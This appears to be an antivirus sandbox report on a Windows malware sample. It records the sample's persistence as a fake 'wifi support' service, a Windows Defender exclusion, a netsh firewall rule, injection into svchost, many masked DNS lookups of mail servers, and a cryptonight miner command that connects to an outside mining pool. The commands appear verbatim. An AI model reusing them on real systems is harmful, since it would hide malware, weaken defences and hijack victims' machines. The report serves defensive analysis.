Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\dthndytb] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dthndytb] 'ImagePath' = '%WINDIR%\SysWOW64\dthndytb\qoxyhdso.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\dthndytb] 'ImagePath' = '%WINDIR%\SysWOW64\dthndytb\qoxyhdso.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\dthndytb' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\qoxyhdso.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\qoxyhdso.exe to %WINDIR%\syswow64\dthndytb\qoxyhdso.exe
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK cl###onutz.com
- DNS ASK mx#.#ridex.ro
- DNS ASK tr##ex.ro
- DNS ASK zi##uz.com
- DNS ASK pr####ibeijing.com
- DNS ASK pa##r.co.uk
- DNS ASK eu#######nbound-1.mimecast.com
- DNS ASK si###c.co.uk
- DNS ASK mc#####nphillips.co.uk
- DNS ASK cl######.eu.messagelabs.com
- DNS ASK au#######nbound-1.mimecast.com
- DNS ASK hm##.gsi.gov.uk
- DNS ASK ne##########uk.mail.protection.outlook.com
- DNS ASK ne###oup.co.uk
- DNS ASK in####ors.iii.co.uk
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK tr###nttech.edu
- DNS ASK ma##.####chinaembassy.org.uk
- DNS ASK ed#####naembassy.org.uk
- DNS ASK ASPMX.L.GOOGLE.com
- DNS ASK tr####t-design.com
- DNS ASK mx.##########tions.com.cust.a.hostedemail.com
- DNS ASK ga###r.co.uk
- DNS ASK ly##s.co.uk
- DNS ASK no#.co.uk
- DNS ASK mx#.#aver.com
- DNS ASK ma##.##rowforklift.com
- DNS ASK ar####orklift.com
- DNS ASK gw##.net
- DNS ASK mx#.#bhdns.com
- DNS ASK me####ough.co.uk
- DNS ASK mc##d.co.uk
- DNS ASK ma##.#piclink.net
- DNS ASK su###buttes.net
- DNS ASK sr#.com
- DNS ASK ge###ties.com
- DNS ASK tr####solutions.com
- DNS ASK mx.#####.##.uk.cust.b.hostedemail.com
- DNS ASK cu#######-1.in.mailcontrol.com
- DNS ASK ro####judd.co.uk
- DNS ASK ya##o.ca
- DNS ASK ma#####rtual.gwtc.net
- DNS ASK sb##.net
- DNS ASK o2.#o.uk
- DNS ASK su####list.co.uk
- DNS ASK he#####sleisure.co.uk
- DNS ASK am##on.com
- DNS ASK ho##ail.fr
- DNS ASK na##r.com
- DNS ASK google.com
- DNS ASK cu#######1.in.mailcontrol.com
- DNS ASK mx.###cali.co.uk
- DNS ASK li#t.ru
- DNS ASK mx.###owford.com
- DNS ASK ar###ford.com
- DNS ASK pp######nd-1.cdscore.com
- DNS ASK fl###hman.com
- DNS ASK d1######.#ss.barracudanetworks.com
- DNS ASK ci###fno.com
- DNS ASK gp####.1dial.net
- DNS ASK tr###untyi.net
- DNS ASK in###nd.gci.net
- DNS ASK mx#.mail.ru
- DNS ASK gc#.net
- DNS ASK mx#.qq.com
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK qq.com
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK ho###il.co.uk
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK mw##.co.uk
- DNS ASK mx#.#harter.net
- DNS ASK ms#####p-mx2.hinet.net
- DNS ASK da###ail.net
- DNS ASK ms#.#inet.net
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ya##o.com
- DNS ASK su##om.net
- DNS ASK ma###.##x.gridhost.co.uk
- DNS ASK we####oint.co.uk
- DNS ASK ma#####ster.zen.co.uk
- DNS ASK me#####stwales.org.uk
- DNS ASK te######005.terrapinn.com
- DNS ASK te#####l3.terrapinn.com
- DNS ASK re##.co.uk
- DNS ASK en###b-cn.com
- DNS ASK ch##ter.net
- DNS ASK mx###.##tispameurope.com
- DNS ASK tr##ec.com
- DNS ASK ma##.##llsprings.org.uk
- DNS ASK we####rings.org.uk
- DNS ASK sm###in.sfr.fr
- DNS ASK sf#.fr
- DNS ASK ms#####p-mx1.hinet.net
- DNS ASK ms##.hinet.net
- DNS ASK aq###ais.net
- DNS ASK ti###li.co.uk
- DNS ASK no#######.#ail.protection.outlook.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\dthndytb\qoxyhdso.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\dthndytb\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\qoxyhdso.exe" %WINDIR%\SysWOW64\dthndytb\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create dthndytb binPath= "%WINDIR%\SysWOW64\dthndytb\qoxyhdso.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description dthndytb "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start dthndytb' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\dthndytb\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\qoxyhdso.exe" %WINDIR%\SysWOW64\dthndytb\
- '%WINDIR%\syswow64\sc.exe' create dthndytb binPath= "%WINDIR%\SysWOW64\dthndytb\qoxyhdso.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description dthndytb "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start dthndytb
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -a cryptonight-heavy -o stratum+tcp://91.235.128.95:8087 -u w1 -p x --nicehash --safe